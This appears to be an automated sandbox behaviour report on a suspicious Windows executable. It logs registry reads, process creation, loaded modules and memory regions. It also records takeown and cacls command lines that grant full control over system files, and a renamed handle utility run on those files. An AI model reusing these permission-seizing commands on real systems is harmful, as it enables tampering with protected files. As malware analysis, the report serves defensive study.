| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 16 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 232, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xec4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x8d4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x41c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "blank.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "blank.jtp" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #132: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #132 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "Journal.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:40, Reason: Child Process |
| Unmonitor | End Time: 00:02:55, Reason: Self Terminated |
| Monitor Duration | 00:00:15 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc40 |
| Parent PID | 0x150 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
424
0x
75C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000002b0000 | 0x002b0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00343fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00350fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x00361fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004540000 | 0x04540000 | 0x0472ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04540000 | 0x045fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004630000 | 0x04630000 | 0x0472ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004730000 | 0x04730000 | 0x0482ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004830000 | 0x04830000 | 0x049effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x049f0000 | 0x04d26fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ef20000 | 0x7ef20000 | 0x7f01ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f020000 | 0x7f020000 | 0x7f042fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f044000 | 0x7f044000 | 0x7f044fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f046000 | 0x7f046000 | 0x7f046fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f04a000 | 0x7f04a000 | 0x7f04cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f04d000 | 0x7f04d000 | 0x7f04ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 136, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xe8c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #133: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #133 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:40, Reason: Child Process |
| Unmonitor | End Time: 00:02:55, Reason: Self Terminated |
| Monitor Duration | 00:00:15 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x45c |
| Parent PID | 0x85c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DF0
0x
34C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000be0000 | 0x00be0000 | 0x00bfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000be0000 | 0x00be0000 | 0x00beffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000bf0000 | 0x00bf0000 | 0x00bf3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c00000 | 0x00c00000 | 0x00c01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c00000 | 0x00c00000 | 0x00c0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c10000 | 0x00c10000 | 0x00c23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c30000 | 0x00c30000 | 0x00c6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c70000 | 0x00c70000 | 0x00caffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cb0000 | 0x00cb0000 | 0x00cb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000cc0000 | 0x00cc0000 | 0x00cc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00cd1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d20000 | 0x00d20000 | 0x00d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d60000 | 0x00d60000 | 0x00d63fff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00d70000 | 0x00d71fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000d90000 | 0x00d90000 | 0x00d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000da0000 | 0x00da0000 | 0x00f8ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00da0000 | 0x00e5dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000e90000 | 0x00e90000 | 0x00f8ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x05050000 | 0x05386fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007fa20000 | 0x7fa20000 | 0x7fb1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fb20000 | 0x7fb20000 | 0x7fb42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fb48000 | 0x7fb48000 | 0x7fb48fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fb49000 | 0x7fb49000 | 0x7fb4bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fb4c000 | 0x7fb4c000 | 0x7fb4efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fb4f000 | 0x7fb4f000 | 0x7fb4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #134: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #134 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Genko_2.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:40, Reason: Child Process |
| Unmonitor | End Time: 00:02:55, Reason: Self Terminated |
| Monitor Duration | 00:00:15 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x41c |
| Parent PID | 0xa84 (c:\windows\syswow64\takeown.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FD0
0x
FE0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000540000 | 0x00540000 | 0x0055ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x0054ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x00553fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x00561fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x00563fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x00583fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00613fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x00620fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x00631fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00640000 | 0x006fdfff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe.mui | 0x00700000 | 0x00701fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x008bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008c0000 | 0x008c0000 | 0x00a3ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00a40000 | 0x00d76fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f070000 | 0x7f070000 | 0x7f16ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f170000 | 0x7f170000 | 0x7f192fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f195000 | 0x7f195000 | 0x7f197fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f198000 | 0x7f198000 | 0x7f198fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f19a000 | 0x7f19a000 | 0x7f19afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f19d000 | 0x7f19d000 | 0x7f19ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #136: qry2vco264.exe
67
0
| Information | Value |
|---|---|
| ID | #136 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\qry2vco264.exe |
| Command Line | qRY2vco2.exe -accepteula -c -y -p handles -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:42, Reason: Child Process |
| Unmonitor | End Time: 00:02:57, Reason: Self Terminated |
| Monitor Duration | 00:00:15 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf08 |
| Parent PID | 0x828 (c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AE0
0x
384
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
